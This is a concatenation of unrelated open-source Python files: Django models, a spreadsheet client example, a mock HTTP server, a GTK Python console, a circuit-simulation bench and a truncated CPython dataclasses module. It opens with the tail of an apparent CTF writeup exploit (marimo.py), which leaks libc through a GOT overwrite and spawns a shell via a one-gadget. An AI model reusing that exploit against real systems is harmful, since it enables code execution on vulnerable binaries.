r.recvuntil(">>")
r.sendline(str(idx))
data = r.recvuntil(">>")
if profile :
r.sendline("M")
r.recvuntil(">>")
r.sendline(profile)
return data
else :
r.sendline("B")
return data
puts_got = 0x603018
r.recvuntil(">>")
r.sendline("show me the marimo")
r.recvuntil(">>")
r.sendline("Aa")
r.recvuntil(">>")
r.sendline("orange")
time.sleep(1)
sell(0)
buy(1,"danogg","fuck")
buy(1,"orange","fuck")
time.sleep(3)
data = view(0)
ctime = int(data.split("current time :")[1].split("\n")[0].strip())
view(0,"a"*0x30 + p32(ctime) + p32(1) + p64(puts_got) + p64(puts_got))
r.recvuntil(">>")
r.sendline("B")
data = view(1)
libc = u64(data.split("name :")[1].split("\n")[0].strip().ljust(8,"\x00")) - 0x6f690
print hex(libc)
magic = libc + 0x45216
view(1,p64(magic))
r.interactive()
|
scwuaptx/CTF
|
2018-writeup/codegate/marimo.py
|
Python
|
gpl-2.0
| 1,472
|
from django.db import models
# from django.contrib.gis.geoip import GeoIP
#
# g = GeoIP()
# Create your models here.
class TempMail(models.Model):
mailfrom = models.EmailField()
mailsubj = models.CharField(max_length=20)
mailrcvd = models.DateTimeField()
mailhdrs = models.CharField()
class SavedMail(models.Model):
mailrcvd = models.DateTimeField()
mailhdrs = models.CharField()
organization = models.ForeignKey('Organization')
class Organization(models.Model):
emailsuffix = models.CharField(max_length=255)
class Follower(models.Model):
email = models.EmailField()
|
bitsoffreedom/baas
|
baas/boem/models.py
|
Python
|
gpl-2.0
| 607
|
# Copyright (C) 2016 Robert Scott
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
import shutil, os
from client import SpreadsheetClient
if __name__ == "__main__":
"""This script shows how the differnet functions exposed by client.py can be
used."""
EXAMPLE_SPREADSHEET = "example.ods"
# Copy the example spreadsheet from the tests directory into the spreadsheets
# directory
shutil.copyfile(
os.path.join("tests", EXAMPLE_SPREADSHEET),
os.path.join("spreadsheets", EXAMPLE_SPREADSHEET)
)
SHEET_NAME = "Sheet1"
print("Waiting for the example spreadsheet to be scanned and loaded into LibreOffice.")
sc = SpreadsheetClient(EXAMPLE_SPREADSHEET)
# Get sheet names
sheet_names = sc.get_sheet_names()
print(sheet_names)
# Set a cell value
sc.set_cells(SHEET_NAME, "A1", 5)
# Retrieve a cell value.
cell_value = sc.get_cells(SHEET_NAME, "C3")
print(cell_value)
# Set a one dimensional cell range.
# Cells are set using the format: [A1, A2, A3]
cell_values = [1, 2, 3]
sc.set_cells(SHEET_NAME, "A1:A3", cell_values)
# Retrieve one dimensional cell range.
cell_values = sc.get_cells(SHEET_NAME, "C1:C3")
print(cell_values)
# Set a two dimensional cell range.
# Cells are set using the format: [[A1, B1, C1], [A2, B2, C2], [A3, B3, C3]]
cell_values = [[1, 2, 3], [4, 5, 6], [7, 8, 9]]
sc.set_cells(SHEET_NAME, "A1:C3", cell_values)
# Retrieve a two dimensional cell range.
cell_values = sc.get_cells(SHEET_NAME, "A1:C3")
print(cell_values)
# Save a spreadsheet - it will save into ./saved_spreadsheets
sc.save_spreadsheet(EXAMPLE_SPREADSHEET)
sc.disconnect()
os.remove(os.path.join("spreadsheets", EXAMPLE_SPREADSHEET))
|
robsco-git/spreadsheet_server
|
example_client.py
|
Python
|
gpl-2.0
| 2,456
|
#!/usr/bin/env python
#
# Crypto.py
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2 as
# published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston,
# MA 02111-1307 USA
from .JSClass import JSClass
class Crypto(JSClass):
def __init__(self):
pass
@property
def enableSmartCardEvents(self):
return False
@property
def version(self):
return "2.4"
def disableRightClick(self):
pass
def importUserCertificates(self, nickname, cmmfResponse, forceToBackUp): # pylint:disable=unused-argument
return ""
def logout(self):
pass
|
buffer/thug
|
thug/DOM/Crypto.py
|
Python
|
gpl-2.0
| 1,112
|
#!/usr/bin/env python3
# Copyright 2015, 2016 Endless Mobile, Inc.
# This file is part of eos-event-recorder-daemon.
#
# eos-event-recorder-daemon is free software: you can redistribute it and/or
# modify it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 2 of the License, or (at your
# option) any later version.
#
# eos-event-recorder-daemon is distributed in the hope that it will be
# useful, but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General
# Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with eos-event-recorder-daemon. If not, see
# <http://www.gnu.org/licenses/>.
import gzip
import http.server
import sys
class PrintingHTTPRequestHandler(http.server.BaseHTTPRequestHandler):
def do_PUT(self):
print(self.path, flush=True)
content_encoding = self.headers['X-Endless-Content-Encoding']
print(content_encoding, flush=True)
content_length = int(self.headers['Content-Length'])
compressed_request_body = self.rfile.read(content_length)
decompressed_request_body = gzip.decompress(compressed_request_body)
print(len(decompressed_request_body), flush=True)
sys.stdout.buffer.write(decompressed_request_body)
sys.stdout.buffer.flush()
status_code_str = sys.stdin.readline()
status_code = int(status_code_str)
self.send_response(status_code)
self.end_headers()
# A metrics server that simply prints the requests it receives to stdout
class MockServer(http.server.HTTPServer):
def __init__(self):
SERVER_ADDRESS = ('localhost', 0)
super().__init__(SERVER_ADDRESS, PrintingHTTPRequestHandler)
if __name__ == '__main__':
mock_server = MockServer()
print(mock_server.server_port, flush=True)
mock_server.serve_forever()
|
endlessm/eos-event-recorder-daemon
|
tests/daemon/mock-server.py
|
Python
|
gpl-2.0
| 1,987
|
#
# pyconsole.py
#
# Copyright (C) 2004-2006 by Yevgen Muntyan <muntyan@math.tamu.edu>
# Portions of code by Geoffrey French.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public version 2.1 as
# published by the Free Software Foundation.
#
# See COPYING.lib file that comes with this distribution for full text
# of the license.
#
# This module 'runs' python interpreter in a TextView widget.
# The main class is Console, usage is:
# Console(locals=None, banner=None, completer=None, use_rlcompleter=True, start_script='') -
# it creates the widget and 'starts' interactive session; see the end
# of this file. If start_script is not empty, it pastes it as it was
# entered from keyboard.
#
# Console has "command" signal which is emitted when code is about to
# be executed. You may connect to it using console.connect or
# console.connect_after to get your callback ran before or after the
# code is executed.
#
# To modify output appearance, set attributes of console.stdout_tag and
# console.stderr_tag.
#
# Console may subclass a type other than gtk.TextView, to allow syntax
# highlighting and stuff,
# e.g.:
# console_type = pyconsole.ConsoleType(moo.edit.TextView)
# console = console_type(use_rlcompleter=False, start_script="import moo\nimport gtk\n")
#
# This widget is not a replacement for real terminal with python running
# inside: GtkTextView is not a terminal.
# The use case is: you have a python program, you create this widget,
# and inspect your program interiors.
import gtk
import gtk.gdk as gdk
import gobject
import pango
import gtk.keysyms as _keys
import code
import sys
import keyword
import re
# commonprefix() from posixpath
def _commonprefix(m):
"Given a list of pathnames, returns the longest common leading component"
if not m: return ''
prefix = m[0]
for item in m:
for i in range(len(prefix)):
if prefix[:i+1] != item[:i+1]:
prefix = prefix[:i]
if i == 0:
return ''
break
return prefix
class _ReadLine(object):
class Output(object):
def __init__(self, console, tag_name):
object.__init__(self)
self.buffer = console.get_buffer()
self.tag_name = tag_name
def write(self, text):
pos = self.buffer.get_iter_at_mark(self.buffer.get_insert())
self.buffer.insert_with_tags_by_name(pos, text, self.tag_name)
class History(object):
def __init__(self):
object.__init__(self)
self.items = ['']
self.ptr = 0
self.edited = {}
def commit(self, text):
if text and self.items[-1] != text:
self.items.append(text)
self.ptr = 0
self.edited = {}
def get(self, dir, text):
if len(self.items) == 1:
return None
if text != self.items[self.ptr]:
self.edited[self.ptr] = text
elif self.edited.has_key(self.ptr):
del self.edited[self.ptr]
self.ptr = self.ptr + dir
if self.ptr >= len(self.items):
self.ptr = 0
elif self.ptr < 0:
self.ptr = len(self.items) - 1
try:
return self.edited[self.ptr]
except KeyError:
return self.items[self.ptr]
def __init__(self, quit_func=None):
object.__init__(self)
self.quit_func = quit_func
self.set_wrap_mode(gtk.WRAP_CHAR)
self.modify_font(pango.FontDescription("Monospace"))
self.buffer = self.get_buffer()
self.buffer.connect("insert-text", self.on_buf_insert)
self.buffer.connect("delete-range", self.on_buf_delete)
self.buffer.connect("mark-set", self.on_buf_mark_set)
self.do_insert = False
self.do_delete = False
self.stdout_tag = self.buffer.create_tag("stdout", foreground="#006000")
self.stderr_tag = self.buffer.create_tag("stderr", foreground="#B00000")
self._stdout = _ReadLine.Output(self, "stdout")
self._stderr = _ReadLine.Output(self, "stderr")
self.cursor = self.buffer.create_mark("cursor",
self.buffer.get_start_iter(),
False)
insert = self.buffer.get_insert()
self.cursor.set_visible(True)
insert.set_visible(False)
self.ps = ''
self.in_raw_input = False
self.run_on_raw_input = None
self.tab_pressed = 0
self.history = _ReadLine.History()
self.nonword_re = re.compile("[^\w\._]")
def freeze_undo(self):
try: self.begin_not_undoable_action()
except: pass
def thaw_undo(self):
try: self.end_not_undoable_action()
except: pass
def raw_input(self, ps=None):
if ps:
self.ps = ps
else:
self.ps = ''
iter = self.buffer.get_iter_at_mark(self.buffer.get_insert())
if ps:
self.freeze_undo()
self.buffer.insert(iter, self.ps)
self.thaw_undo()
self.__move_cursor_to(iter)
self.scroll_to_mark(self.cursor, 0.2)
self.in_raw_input = True
if self.run_on_raw_input:
run_now = self.run_on_raw_input
self.run_on_raw_input = None
self.buffer.insert_at_cursor(run_now + '\n')
def on_buf_mark_set(self, buffer, iter, mark):
if mark is not buffer.get_insert():
return
start = self.__get_start()
end = self.__get_end()
if iter.compare(self.__get_start()) >= 0 and \
iter.compare(self.__get_end()) <= 0:
buffer.move_mark_by_name("cursor", iter)
self.scroll_to_mark(self.cursor, 0.2)
def __insert(self, iter, text):
self.do_insert = True
self.buffer.insert(iter, text)
self.do_insert = False
def on_buf_insert(self, buf, iter, text, len):
if not self.in_raw_input or self.do_insert or not len:
return
buf.stop_emission("insert-text")
lines = text.splitlines()
need_eol = False
for l in lines:
if need_eol:
self._commit()
iter = self.__get_cursor()
else:
cursor = self.__get_cursor()
if iter.compare(self.__get_start()) < 0:
iter = cursor
elif iter.compare(self.__get_end()) > 0:
iter = cursor
else:
self.__move_cursor_to(iter)
need_eol = True
self.__insert(iter, l)
self.__move_cursor(0)
def __delete(self, start, end):
self.do_delete = True
self.buffer.delete(start, end)
self.do_delete = False
def on_buf_delete(self, buf, start, end):
if not self.in_raw_input or self.do_delete:
return
buf.stop_emission("delete-range")
start.order(end)
line_start = self.__get_start()
line_end = self.__get_end()
if start.compare(line_end) > 0:
return
if end.compare(line_start) < 0:
return
self.__move_cursor(0)
if start.compare(line_start) < 0:
start = line_start
if end.compare(line_end) > 0:
end = line_end
self.__delete(start, end)
def do_key_press_event(self, event, parent_type):
if not self.in_raw_input:
return parent_type.do_key_press_event(self, event)
tab_pressed = self.tab_pressed
self.tab_pressed = 0
handled = True
state = event.state & (gdk.SHIFT_MASK |
gdk.CONTROL_MASK |
gdk.MOD1_MASK)
keyval = event.keyval
if not state:
if keyval == _keys.Return:
self._commit()
elif keyval == _keys.Up:
self.__history(-1)
elif keyval == _keys.Down:
self.__history(1)
elif keyval == _keys.Left:
self.__move_cursor(-1)
elif keyval == _keys.Right:
self.__move_cursor(1)
elif keyval == _keys.Home:
self.__move_cursor(-10000)
elif keyval == _keys.End:
self.__move_cursor(10000)
elif keyval == _keys.Tab:
cursor = self.__get_cursor()
if cursor.starts_line():
handled = False
else:
cursor.backward_char()
if cursor.get_char().isspace():
handled = False
else:
self.tab_pressed = tab_pressed + 1
self.__complete()
else:
handled = False
elif state == gdk.CONTROL_MASK:
if keyval == _keys.u:
start = self.__get_start()
end = self.__get_cursor()
self.__delete(start, end)
elif keyval == _keys.d:
if self.quit_func:
self.quit_func()
else:
handled = False
else:
handled = False
if not handled:
return parent_type.do_key_press_event(self, event)
else:
return True
def __history(self, dir):
text = self._get_line()
new_text = self.history.get(dir, text)
if not new_text is None:
self.__replace_line(new_text)
self.__move_cursor(0)
self.scroll_to_mark(self.cursor, 0.2)
def __get_cursor(self):
return self.buffer.get_iter_at_mark(self.cursor)
def __get_start(self):
iter = self.__get_cursor()
iter.set_line_offset(len(self.ps))
return iter
def __get_end(self):
iter = self.__get_cursor()
if not iter.ends_line():
iter.forward_to_line_end()
return iter
def __get_text(self, start, end):
return self.buffer.get_text(start, end, False)
def __move_cursor_to(self, iter):
self.buffer.place_cursor(iter)
self.buffer.move_mark_by_name("cursor", iter)
def __move_cursor(self, howmany):
iter = self.__get_cursor()
end = self.__get_cursor()
if not end.ends_line():
end.forward_to_line_end()
line_len = end.get_line_offset()
move_to = iter.get_line_offset() + howmany
move_to = min(max(move_to, len(self.ps)), line_len)
iter.set_line_offset(move_to)
self.__move_cursor_to(iter)
def __delete_at_cursor(self, howmany):
iter = self.__get_cursor()
end = self.__get_cursor()
if not end.ends_line():
end.forward_to_line_end()
line_len = end.get_line_offset()
erase_to = iter.get_line_offset() + howmany
if erase_to > line_len:
erase_to = line_len
elif erase_to < len(self.ps):
erase_to = len(self.ps)
end.set_line_offset(erase_to)
self.__delete(iter, end)
def __get_width(self):
if not (self.flags() & gtk.REALIZED):
return 80
layout = pango.Layout(self.get_pango_context())
letters = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
layout.set_text(letters)
pix_width = layout.get_pixel_size()[0]
return self.allocation.width * len(letters) / pix_width
def __print_completions(self, completions):
line_start = self.__get_text(self.__get_start(), self.__get_cursor())
line_end = self.__get_text(self.__get_cursor(), self.__get_end())
iter = self.buffer.get_end_iter()
self.__move_cursor_to(iter)
self.__insert(iter, "\n")
width = max(self.__get_width(), 4)
max_width = max([len(s) for s in completions])
n_columns = max(int(width / (max_width + 1)), 1)
col_width = int(width / n_columns)
total = len(completions)
col_length = total / n_columns
if total % n_columns:
col_length = col_length + 1
col_length = max(col_length, 1)
if col_length == 1:
n_columns = total
col_width = width / total
for i in range(col_length):
for j in range(n_columns):
ind = i + j*col_length
if ind < total:
if j == n_columns - 1:
n_spaces = 0
else:
n_spaces = col_width - len(completions[ind])
self.__insert(iter, completions[ind] + " " * n_spaces)
self.__insert(iter, "\n")
self.__insert(iter, "%s%s%s" % (self.ps, line_start, line_end))
iter.set_line_offset(len(self.ps) + len(line_start))
self.__move_cursor_to(iter)
self.scroll_to_mark(self.cursor, 0.2)
def __complete(self):
text = self.__get_text(self.__get_start(), self.__get_cursor())
start = ''
word = text
nonwords = self.nonword_re.findall(text)
if nonwords:
last = text.rfind(nonwords[-1]) + len(nonwords[-1])
start = text[:last]
word = text[last:]
completions = self.complete(word)
if completions:
prefix = _commonprefix(completions)
if prefix != word:
start_iter = self.__get_start()
start_iter.forward_chars(len(start))
end_iter = start_iter.copy()
end_iter.forward_chars(len(word))
self.__delete(start_iter, end_iter)
self.__insert(end_iter, prefix)
elif self.tab_pressed > 1:
self.freeze_undo()
self.__print_completions(completions)
self.thaw_undo()
self.tab_pressed = 0
def complete(self, text):
return None
def _get_line(self):
start = self.__get_start()
end = self.__get_end()
return self.buffer.get_text(start, end, False)
def __replace_line(self, new_text):
start = self.__get_start()
end = self.__get_end()
self.__delete(start, end)
self.__insert(end, new_text)
def _commit(self):
end = self.__get_cursor()
if not end.ends_line():
end.forward_to_line_end()
text = self._get_line()
self.__move_cursor_to(end)
self.freeze_undo()
self.__insert(end, "\n")
self.in_raw_input = False
self.history.commit(text)
self.do_raw_input(text)
self.thaw_undo()
def do_raw_input(self, text):
pass
class _Console(_ReadLine, code.InteractiveInterpreter):
def __init__(self, locals=None, banner=None,
completer=None, use_rlcompleter=True,
start_script=None, quit_func=None):
_ReadLine.__init__(self, quit_func)
code.InteractiveInterpreter.__init__(self, locals)
self.locals["__console__"] = self
self.start_script = start_script
self.completer = completer
self.banner = banner
if not self.completer and use_rlcompleter:
try:
import rlcompleter
self.completer = rlcompleter.Completer()
except ImportError:
pass
self.ps1 = ">>> "
self.ps2 = "... "
self.__start()
self.run_on_raw_input = start_script
self.raw_input(self.ps1)
def __start(self):
self.cmd_buffer = ""
self.freeze_undo()
self.thaw_undo()
self.do_delete = True
self.buffer.set_text("")
self.do_delete = False
if self.banner:
iter = self.buffer.get_start_iter()
self.buffer.insert_with_tags_by_name(iter, self.banner, "stdout")
if not iter.starts_line():
self.buffer.insert(iter, "\n")
def clear(self, start_script=None):
if start_script is None:
start_script = self.start_script
else:
self.start_script = start_script
self.__start()
self.run_on_raw_input = start_script
def do_raw_input(self, text):
if self.cmd_buffer:
cmd = self.cmd_buffer + "\n" + text
else:
cmd = text
saved_stdout, saved_stderr = sys.stdout, sys.stderr
sys.stdout, sys.stderr = self._stdout, self._stderr
if self.runsource(cmd):
self.cmd_buffer = cmd
ps = self.ps2
else:
self.cmd_buffer = ''
ps = self.ps1
sys.stdout, sys.stderr = saved_stdout, saved_stderr
self.raw_input(ps)
def do_command(self, code):
try:
eval(code, self.locals)
except SystemExit:
raise
except:
self.showtraceback()
def runcode(self, code):
if gtk.pygtk_version[1] < 8:
self.do_command(code)
else:
self.emit("command", code)
def exec_command(self, command):
if self._get_line():
self._commit()
self.buffer.insert_at_cursor(command)
self._commit()
def complete_attr(self, start, end):
try:
obj = eval(start, self.locals)
strings = dir(obj)
if end:
completions = {}
for s in strings:
if s.startswith(end):
completions[s] = None
completions = completions.keys()
else:
completions = strings
completions.sort()
return [start + "." + s for s in completions]
except:
return None
def complete(self, text):
if self.completer:
completions = []
i = 0
try:
while 1:
s = self.completer.complete(text, i)
if s:
completions.append(s)
i = i + 1
else:
completions.sort()
return completions
except NameError:
return None
dot = text.rfind(".")
if dot >= 0:
return self.complete_attr(text[:dot], text[dot+1:])
completions = {}
strings = keyword.kwlist
if self.locals:
strings.extend(self.locals.keys())
try: strings.extend(eval("globals()", self.locals).keys())
except: pass
try:
exec "import __builtin__" in self.locals
strings.extend(eval("dir(__builtin__)", self.locals))
except:
pass
for s in strings:
if s.startswith(text):
completions[s] = None
completions = completions.keys()
completions.sort()
return completions
def ReadLineType(t=gtk.TextView):
class readline(t, _ReadLine):
def __init__(self, *args, **kwargs):
t.__init__(self)
_ReadLine.__init__(self, *args, **kwargs)
def do_key_press_event(self, event):
return _ReadLine.do_key_press_event(self, event, t)
gobject.type_register(readline)
return readline
def ConsoleType(t=gtk.TextView):
class console_type(t, _Console):
__gsignals__ = {
'command' : (gobject.SIGNAL_RUN_LAST, gobject.TYPE_NONE, (object,)),
'key-press-event' : 'override'
}
def __init__(self, *args, **kwargs):
if gtk.pygtk_version[1] < 8:
gobject.GObject.__init__(self)
else:
t.__init__(self)
_Console.__init__(self, *args, **kwargs)
def do_command(self, code):
return _Console.do_command(self, code)
def do_key_press_event(self, event):
return _Console.do_key_press_event(self, event, t)
if gtk.pygtk_version[1] < 8:
gobject.type_register(console_type)
return console_type
ReadLine = ReadLineType()
Console = ConsoleType()
def _make_window():
window = gtk.Window()
window.set_title("pyconsole.py")
swin = gtk.ScrolledWindow()
swin.set_policy(gtk.POLICY_AUTOMATIC, gtk.POLICY_ALWAYS)
window.add(swin)
console = Console(banner="Hello there!",
use_rlcompleter=False,
start_script="from gtk import *\n")
swin.add(console)
window.set_default_size(500, 400)
window.show_all()
if not gtk.main_level():
window.connect("destroy", gtk.main_quit)
gtk.main()
return console
if __name__ == '__main__':
if len(sys.argv) < 2 or sys.argv[1] != '-gimp':
_make_window()
|
jdburton/gimp-osx
|
src/gimp-2.6.12/plug-ins/pygimp/plug-ins/pyconsole.py
|
Python
|
gpl-2.0
| 20,993
|
## Benches
from lib.inductor.rf import sp as Sp
from syntax import *
from functions.science import linspace
@setenv(type='bench', name='sp1')
class sp1():
def __init__(self, **parameters):
ls = parameters.get('ls', 1e-9)
rs = parameters.get('rs', 1.0)
cp = parameters.get('cp', 150e-15)
cs = parameters.get('cs', 30e-15)
rac = parameters.get('rac', 1)
ldc = parameters.get('ldc', 1e-9)
k1 = parameters.get('k1', 0.9)
rsub = parameters.get('rsub', 1)
freq = linspace(0.1e9, 15e9, 101)
lib = myinductor(name='myinductor', rs=rs, ls=ls, cp=cp, cs=cs, rac=rac, ldc=ldc,
k1=k1, rsub=rsub)
dev = Device(model='myinductor', nodes=('plus', 'minus', '0'))
cir1 = Sp(library=lib, device=dev, freq=freq)
cir1.simulate(verbose=True)
y11, y12, y21, y22 = cir1.Y()
self.freq = freq
self.l11 = (1.0/y11).imag/(2.0*pi*freq)
self.r11 = (1.0/y11).real
self.q11 = (1.0/y11).imag/(1/y11).real
@setenv(type='bench', name='sp2')
class sp2():
def __init__(self, **parameters):
freq = linspace(0.1e9, 15e9, 101)
dev = Nport(nodes=('plus', '0', 'minus', '0'), file='./examples/MyInductor/mydata.s2p')
cir1 = Sp(device=dev, freq=freq)
cir1.simulate(verbose=True)
y11, y12, y21, y22 = cir1.Y()
self.freq = freq
self.l11 = (1.0/y11).imag/(2.0*pi*freq)
self.r11 = (1.0/y11).real
self.q11 = (1.0/y11).imag/(1/y11).real
|
raphaelvalentin/QTModel
|
examples/MyInductor/mybench.py
|
Python
|
gpl-2.0
| 1,574
|
import re
import sys
import copy
import types
import inspect
import keyword
import builtins
import functools
import _thread
__all__ = ['dataclass',
'field',
'Field',
'FrozenInstanceError',
'InitVar',
'MISSING',
# Helper functions.
'fields',
'asdict',
'astuple',
'make_dataclass',
'replace',
'is_dataclass',
]
# Conditions for adding methods. The boxes indicate what action the
# dataclass decorator takes. For all of these tables, when I talk
# about init=, repr=, eq=, order=, unsafe_hash=, or frozen=, I'm
# referring to the arguments to the @dataclass decorator. When
# checking if a dunder method already exists, I mean check for an
# entry in the class's __dict__. I never check to see if an attribute
# is defined in a base class.
# Key:
# +=========+=========================================+
# + Value | Meaning |
# +=========+=========================================+
# | <blank> | No action: no method is added. |
# +---------+-----------------------------------------+
# | add | Generated method is added. |
# +---------+-----------------------------------------+
# | raise | TypeError is raised. |
# +---------+-----------------------------------------+
# | None | Attribute is set to None. |
# +=========+=========================================+
# __init__
#
# +--- init= parameter
# |
# v | | |
# | no | yes | <--- class has __init__ in __dict__?
# +=======+=======+=======+
# | False | | |
# +-------+-------+-------+
# | True | add | | <- the default
# +=======+=======+=======+
# __repr__
#
# +--- repr= parameter
# |
# v | | |
# | no | yes | <--- class has __repr__ in __dict__?
# +=======+=======+=======+
# | False | | |
# +-------+-------+-------+
# | True | add | | <- the default
# +=======+=======+=======+
# __setattr__
# __delattr__
#
# +--- frozen= parameter
# |
# v | | |
# | no | yes | <--- class has __setattr__ or __delattr__ in __dict__?
# +=======+=======+=======+
# | False | | | <- the default
# +-------+-------+-------+
# | True | add | raise |
# +=======+=======+=======+
# Raise because not adding these methods would break the "frozen-ness"
# of the class.
# __eq__
#
# +--- eq= parameter
# |
# v | | |
# | no | yes | <--- class has __eq__ in __dict__?
# +=======+=======+=======+
# | False | | |
# +-------+-------+-------+
# | True | add | | <- the default
# +=======+=======+=======+
# __lt__
# __le__
# __gt__
# __ge__
#
# +--- order= parameter
# |
# v | | |
# | no | yes | <--- class has any comparison method in __dict__?
# +=======+=======+=======+
# | False | | | <- the default
# +-------+-------+-------+
# | True | add | raise |
# +=======+=======+=======+
# Raise because to allow this case would interfere with using
# functools.total_ordering.
# __hash__
# +------------------- unsafe_hash= parameter
# | +----------- eq= parameter
# | | +--- frozen= parameter
# | | |
# v v v | | |
# | no | yes | <--- class has explicitly defined __hash__
# +=======+=======+=======+========+========+
# | False | False | False | | | No __eq__, use the base class __hash__
# +-------+-------+-------+--------+--------+
# | False | False | True | | | No __eq__, use the base class __hash__
# +-------+-------+-------+--------+--------+
# | False | True | False | None | | <-- the default, not hashable
# +-------+-------+-------+--------+--------+
# | False | True | True | add | | Frozen, so hashable, allows override
# +-------+-------+-------+--------+--------+
# | True | False | False | add | raise | Has no __eq__, but hashable
# +-------+-------+-------+--------+--------+
# | True | False | True | add | raise | Has no __eq__, but hashable
# +-------+-------+-------+--------+--------+
# | True | True | False | add | raise | Not frozen, but hashable
# +-------+-------+-------+--------+--------+
# | True | True | True | add | raise | Frozen, so hashable
# +=======+=======+=======+========+========+
# For boxes that are blank, __hash__ is untouched and therefore
# inherited from the base class. If the base is object, then
# id-based hashing is used.
#
# Note that a class may already have __hash__=None if it specified an
# __eq__ method in the class body (not one that was created by
# @dataclass).
#
# See _hash_action (below) for a coded version of this table.
# Raised when an attempt is made to modify a frozen class.
class FrozenInstanceError(AttributeError): pass
# A sentinel object for default values to signal that a default
# factory will be used. This is given a nice repr() which will appear
# in the function signature of dataclasses' constructors.
class _HAS_DEFAULT_FACTORY_CLASS:
def __repr__(self):
return '<factory>'
_HAS_DEFAULT_FACTORY = _HAS_DEFAULT_FACTORY_CLASS()
# A sentinel object to detect if a parameter is supplied or not. Use
# a class to give it a better repr.
class _MISSING_TYPE:
pass
MISSING = _MISSING_TYPE()
# Since most per-field metadata will be unused, create an empty
# read-only proxy that can be shared among all fields.
_EMPTY_METADATA = types.MappingProxyType({})
# Markers for the various kinds of fields and pseudo-fields.
class _FIELD_BASE:
def __init__(self, name):
self.name = name
def __repr__(self):
return self.name
_FIELD = _FIELD_BASE('_FIELD')
_FIELD_CLASSVAR = _FIELD_BASE('_FIELD_CLASSVAR')
_FIELD_INITVAR = _FIELD_BASE('_FIELD_INITVAR')
# The name of an attribute on the class where we store the Field
# objects. Also used to check if a class is a Data Class.
_FIELDS = '__dataclass_fields__'
# The name of an attribute on the class that stores the parameters to
# @dataclass.
_PARAMS = '__dataclass_params__'
# The name of the function, that if it exists, is called at the end of
# __init__.
_POST_INIT_NAME = '__post_init__'
# String regex that string annotations for ClassVar or InitVar must match.
# Allows "identifier.identifier[" or "identifier[".
# https://bugs.python.org/issue33453 for details.
_MODULE_IDENTIFIER_RE = re.compile(r'^(?:\s*(\w+)\s*\.)?\s*(\w+)')
class _InitVarMeta(type):
def __getitem__(self, params):
return self
class InitVar(metaclass=_InitVarMeta):
pass
# Instances of Field are only ever created from within this module,
# and only from the field() function, although Field instances are
# exposed externally as (conceptually) read-only objects.
#
# name and type are filled in after the fact, not in __init__.
# They're not known at the time this class is instantiated, but it's
# convenient if they're available later.
#
# When cls._FIELDS is filled in with a list of Field objects, the name
# and type fields will have been populated.
class Field:
__slots__ = ('name',
'type',
'default',
'default_factory',
'repr',
'hash',
'init',
'compare',
'metadata',
'_field_type', # Private: not to be used by user code.
)
def __init__(self, default, default_factory, init, repr, hash, compare,
metadata):
self.name = None
self.type = None
self.default = default
self.default_factory = default_factory
self.init = init
self.repr = repr
self.hash = hash
self.compare = compare
self.metadata = (_EMPTY_METADATA
if metadata is None or len(metadata) == 0 else
types.MappingProxyType(metadata))
self._field_type = None
def __repr__(self):
return ('Field('
f'name={self.name!r},'
f'type={self.type!r},'
f'default={self.default!r},'
f'default_factory={self.default_factory!r},'
f'init={self.init!r},'
f'repr={self.repr!r},'
f'hash={self.hash!r},'
f'compare={self.compare!r},'
f'metadata={self.metadata!r},'
f'_field_type={self._field_type}'
')')
# This is used to support the PEP 487 __set_name__ protocol in the
# case where we're using a field that contains a descriptor as a
# default value. For details on __set_name__, see
# https://www.python.org/dev/peps/pep-0487/#implementation-details.
#
# Note that in _process_class, this Field object is overwritten
# with the default value, so the end result is a descriptor that
# had __set_name__ called on it at the right time.
def __set_name__(self, owner, name):
func = getattr(type(self.default), '__set_name__', None)
if func:
# There is a __set_name__ method on the descriptor, call
# it.
func(self.default, owner, name)
class _DataclassParams:
__slots__ = ('init',
'repr',
'eq',
'order',
'unsafe_hash',
'frozen',
)
def __init__(self, init, repr, eq, order, unsafe_hash, frozen):
self.init = init
self.repr = repr
self.eq = eq
self.order = order
self.unsafe_hash = unsafe_hash
self.frozen = frozen
def __repr__(self):
return ('_DataclassParams('
f'init={self.init!r},'
f'repr={self.repr!r},'
f'eq={self.eq!r},'
f'order={self.order!r},'
f'unsafe_hash={self.unsafe_hash!r},'
f'frozen={self.frozen!r}'
')')
# This function is used instead of exposing Field creation directly,
# so that a type checker can be told (via overloads) that this is a
# function whose type depends on its parameters.
def field(*, default=MISSING, default_factory=MISSING, init=True, repr=True,
hash=None, compare=True, metadata=None):
"""Return an object to identify dataclass fields.
default is the default value of the field. default_factory is a
0-argument function called to initialize a field's value. If init
is True, the field will be a parameter to the class's __init__()
function. If repr is True, the field will be included in the
object's repr(). If hash is True, the field will be included in
the object's hash(). If compare is True, the field will be used
in comparison functions. metadata, if specified, must be a
mapping which is stored but not otherwise examined by dataclass.
It is an error to specify both default and default_factory.
"""
if default is not MISSING and default_factory is not MISSING:
raise ValueError('cannot specify both default and default_factory')
return Field(default, default_factory, init, repr, hash, compare,
metadata)
def _tuple_str(obj_name, fields):
# Return a string representing each field of obj_name as a tuple
# member. So, if fields is ['x', 'y'] and obj_name is "self",
# return "(self.x,self.y)".
# Special case for the 0-tuple.
if not fields:
return '()'
# Note the trailing comma, needed if this turns out to be a 1-tuple.
return f'({",".join([f"{obj_name}.{f.name}" for f in fields])},)'
# This function's logic is copied from "recursive_repr" function in
# reprlib module to avoid dependency.
def _recursive_repr(user_function):
